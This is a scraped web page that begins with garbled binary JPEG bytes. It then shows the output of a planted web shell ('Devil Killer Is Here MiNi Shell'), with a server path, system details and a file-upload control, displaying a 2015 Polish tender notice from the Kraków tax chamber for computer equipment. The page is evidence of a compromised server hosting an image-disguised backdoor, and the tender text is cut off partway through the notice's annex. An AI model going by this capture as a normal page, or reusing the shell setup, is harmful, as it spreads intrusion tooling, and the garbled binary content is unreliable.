JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/170735-N-2015.html

<p class="kh_header"><b>Kraków: Dostawa sprzętu informatycznego i akcesoriów komputerowych dla Izby Skarbowej w Krakowie</b><br>
<b>Numer ogłoszenia: 170735 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Skarbowa w Krakowie , ul. Wiślna 7, 31-007 Kraków, woj. małopolskie, tel. 12 2557-302, faks 12 2557-465.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.is.krakow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu informatycznego i akcesoriów komputerowych dla Izby Skarbowej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych: Część 1: switchy 48 portowych w obudowie RACK 1U - 8 szt. Część 2: zasilaczy awaryjnych: UPS 1500VA - 9 szt. Część 3: akcesoriów komputerowych: 1) Mysz laserowa czarna USB - 200 szt., 2) Dysk Twardy o pojemności 1TB 64MB SATA III 7200rpm 3.5 cal - 20 szt., 3) Dysk Twardy o pojemności 500GB 8MB SATA III 5400rpm 2.5 cal - 10 szt., 4) Dysk Twardy o pojemności 128GB SSD 2.5 cal - 3 szt., 5) Przejściówka z HDMI do VGA - 5 szt., 6) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 15m - 10szt., 7) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 10m - 100szt., 8) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 5m - 100szt., 9)	Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 3m - 100szt., 10) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 2m - 100szt., 11) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 1m - 100szt., 12) Gigabitowy 8 portowy przełącznik sieciowy (Switch) - 21szt., 13) Zasilacz ATX 500W z wentylatorem 120mm -12 szt., 14) Przenośny 2,5 dysk zewnętrzny USB o pojemności 1TB, zasilany za pomącą złącza USB - 30 szt., 15) Klawiatura Przewodowa w układzie US - 200 szt. Część 4: tasiemek do kopii bezpieczeństwa oraz tasiemek czyszczących: 1) Tasiemki do kopii bezpieczeństwa DAT 160 o pojemności natywnej 80GB i pojemności z kompresją 160 GB - w ilości 200 szt., 2) Tasiemki do kopii bezpieczeństwa DAT 72 o pojemności natywnej 36GB i pojemności z kompresją 72 GB - w ilości 30 szt., 3) Tasiemki do kopii bezpieczeństwa DDS-4 o pojemności natywnej 20GB i pojemności z kompresją 40 GB - w ilości 150 szt., 4) Tasiemki czyszczące DAT 160 - w ilości 50 szt., 5) Tasiemki czyszczące DDS4 - w ilości 15 szt. Część 5: komputerów PC - All In One - 81 szt. Część 6: 1) drukarek w ilości 10 sztuk, 2) urządzeń wielofunkcyjnych A4 w ilości 30 szt., 3) skanerów dokumentów w ilości 3 szt. Część 7: 1) serwerów w ilości 2 szt., 2) skanera w ilości 1 szt. 
2. Szczegółowy opis przedmiotu zamówienia dla każdej części został określony w załączniku A do SIWZ.
3. Parametry określone w Załączniku A do SIWZ należy traktować jako wymagane, minimalne parametry oferowanego sprzętu informatycznego i akcesoriów komputerowych, a Zamawiający dopuszcza oferowanie przedmiotu zamówienia o parametrach wyższych, niż żądane..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.70.00-9, 30.23.21.10-8, 30.21.61.10-0, 30.23.60.00-2, 31.68.25.00-5, 48.85.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium 1.dla części 1 zamówienia w kwocie 800,00 zł (słownie osiemset złotych). 2.dla części 2 zamówienia w kwocie 500,00 zł (słownie pięćset złotych). 3.dla części 3 zamówienia w kwocie 900,00 zł (słownie dziewięćset złotych). 4.dla części 4 zamówienia w kwocie 1 300,00 zł (słownie jeden tysiąc trzysta złotych). 5.dla części 5 zamówienia w kwocie 8 000,00 zł (słownie osiem tysięcy złotych). 6. dla części 6 zamówienia w kwocie 3 400,00 zł (słownie trzy tysiące czterysta złotych). 7.dla części 7 zamówienia w kwocie 1 200,00 zł (słownie jeden tysiąc dwieście złotych). 2.Wadium należy wnieść przed upływem terminu składania ofert. 3.Wadium może być wnoszone w jednej lub kilku formach przewidzianych w art. 45 ust. 6 pkt 1 do pkt 5 pzp. 4.W przypadku wnoszenia wadium w pieniądzu Wykonawca dokona przelewu na rachunek bankowy Zamawiającego nr 87 1010 1270 0004 0413 9120 2000 z dopiskiem Wadium - postępowanie nr 1201-LO-1-2.260.32.2015-część. 5. Wadium wniesione w pieniądzu będzie przechowywane na rachunku bankowym. 6.W przypadku wniesienia wadium w formach, o których mowa w art. 45 ust. 6 pkt 2-5 pzp, winny one zawierać w szczególności: określenie przetargu (jego nazwę), nazwę Wykonawcy, określenie Zamawiającego jako beneficjenta, wysokość poręczanej lub gwarantowanej kwoty wadium, termin ważności poręczenia lub gwarancji (obejmujący okres związania ofertą) oraz zobowiązanie poręczyciela lub gwaranta do bezwarunkowej i nieodwołalnej wypłaty sumy wadium na pierwsze żądanie (wystąpienie, wniosek, wezwanie). Zamawiającego w przypadkach określonych w art. 46 ust. 4a i art. 46 ust. 5 pzp poprzez określenie przypadków zatrzymania wadium lub wskazanie co najmniej przepisów ustawy. 7.Zamawiający wymaga od Wykonawcy w przypadku wnoszenia wadium w formach przewidzianych w art. 45 ust. 6 pkt 2-5 pzp złożenia oryginałów w odrębnej kopercie w miejscu składania ofert przed upływem terminu ich składania. 8.Inne zapisy w treści gwarancji lub poręczeń (nie wynikające z odrębnych ogólnie obowiązujących przepisów, które winny być wówczas powołane) nie mogą utrudniać Zamawiającemu realizacji swoich praw do zatrzymania wadium wynikających z zapisów art. 46 ust. 4a i 5 pzp. 9. Wykonawcy, których oferty nie będą zabezpieczone odpowiednią formą wadium, zostaną wykluczeni z postępowania na podstawie art. 24 ust. 2 pkt 2 pzp. 10.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a pzp. 11.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy. 12.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 13.Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 14.Zgodnie z art. 46 ust. 4a pzp, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust. 3 pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust. 1 pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, której mowa w art.24 ust. 2 pkt 5 pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę, jako najkorzystniejszej. 15.Zgodnie z art. 46 ust. 5 pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie. 2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w art. 44 ustawy pzp. Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniającego ten warunek Zamawiający uzna Wykonawcę, który w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował w sposób należyty co najmniej jedną dostawę sprzętu komputerowego odpowiadającą swoim rodzajem tej części przedmiotu zamówienia, na którą Wykonawca składa ofertę, o wartości nie niższej dla każdej z nich, niż wykazana poniżej kwota:
a) część zamówienia nr 5 - wartość zrealizowanej dostawy nie mniejsza, niż 60 000,00 zł. b) część zamówienia nr 6 - wartość zrealizowanej dostawy nie mniejsza, niż 30 000,00 zł. Ocena spełnienia ww warunku będzie dokonywana wg zasady spełnia-nie spełnia na podstawie złożonych dokumentów - załącznik nr 9 do SIWZ dla części nr 5 oraz załącznik nr 11 do SIWZ dla części nr 6. Dla części nr 1, 2, 3, 4, 7 Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w art. 44 ustawy pzp. Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w art. 44 ustawy pzp. Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w art. 44 ustawy pzp. Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia wg zasady spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w art. 44 ustawy pzp. Zamawiający dokona oceny spełniania tego warunku na podstawie złożonego oświadczenia wg zasady spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo (jeżeli dotyczy) złożone w oryginale lub jako odpis pełnomocnictwa poświadczony za zgodność z oryginałem przez notariusza.Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych i ekonomicznych innych podmiotów, zobowiązany jest złożyć wraz z ofertą pisemne zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b pzp (jeżeli dotyczy)- wg załącznika nr 3 do SIWZ. Formularz ofertowy na część 1 - (zał. nr 4 do SIWZ). Formularz ofertowy na część 2 - (zał. nr 5 do SIWZ). Formularz ofertowy na część 3 - (zał. nr 6 do SIWZ). Formularz ofertowy na część 4 - (zał. nr 7 do SIWZ). Formularz ofertowy na część 5 - (zał. nr 8 do SIWZ). Formularz ofertowy na część 6 - (zał. nr 10 do SIWZ). Formularz ofertowy na część 7 - (zał. nr 12 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin dostawy - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Skarbowa w Krakowie, ul. Wiślna 7, 31-007 Kraków pok. 009.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2015 godzina 10:00, miejsce: Izba Skarbowa w Krakowie, ul. Wiślna 7, 31-007 Kraków, pokój numer 9 lub za pośrednictwem poczty..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa switchy 48 portowych w obudowie RACK 1U.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych switchy 48 portowych w obudowie RACK 1U - 8 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.41.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zasilaczy awaryjnych UPS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych zasilaczy awaryjnych UPS 1500VA - 9 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa akcesoriów komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych akcesoriów komputerowych 1) Mysz laserowa czarna USB - 200 szt., 2) Dysk Twardy o pojemności 1TB 64MB SATA III 7200rpm 3.5 - 20 szt., 3) Dysk Twardy o pojemności 500GB 8MB SATA III 5400rpm 2.5 - 10 szt., 4) Dysk Twardy o pojemności 128GB SSD 2.5 - 3 szt., 5) Przejściówka z HDMI do VGA - 5 szt., 6)Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 15m - 10szt., 7)Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 10m - 100szt., 8) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 5m - 100szt., 9) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 3m- 100szt.,
10) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 2m- 100szt.,
11) Kabel sieciowy UTP LAN CAT6, zakończony wtykami RJ45 o dł. 1m - 100szt., 12) Gigabitowy 8 portowy przełącznik sieciowy (Switch) - 21szt.,
13) Zasilacz ATX 500W z wentylatorem 120mm -12 szt., 14) Przenośny 2,5 dysk zewnętrzny USB o pojemności 1TB, zasilany za pomącą złącza USB - 30 szt., 15) Klawiatura Przewodowa w układzie US - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa tasiemek do kopii bezpieczeństwa oraz tasiemek czyszczących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych tasiemek do kopii bezpieczeństwa oraz tasiemek czyszczących: 1) Tasiemki do kopii bezpieczeństwa DAT 160 o pojemności natywnej 80GB i pojemności z kompresją 160 GB - w ilości 200 szt., 2) Tasiemki do kopii bezpieczeństwa DAT 72 o pojemności natywnej 36GB i pojemności z kompresją 72 GB - w ilości 30 szt., 3) Tasiemki do kopii bezpieczeństwa DDS-4 o pojemności natywnej 20GB i pojemności z kompresją 40 GB - w ilości 150 szt., 4) Tasiemki czyszczące DAT 160 - w ilości 50 szt., 5) Tasiemki czyszczące DDS4 - w ilości 15 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin dostawy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa komputerów PC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego - Izby Skarbowej w Krakowie, ul. Wiślna 7, 31-007 Kraków, fabrycznie nowych i nieużywanych komputerów PC - All In One - 81 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p></li>
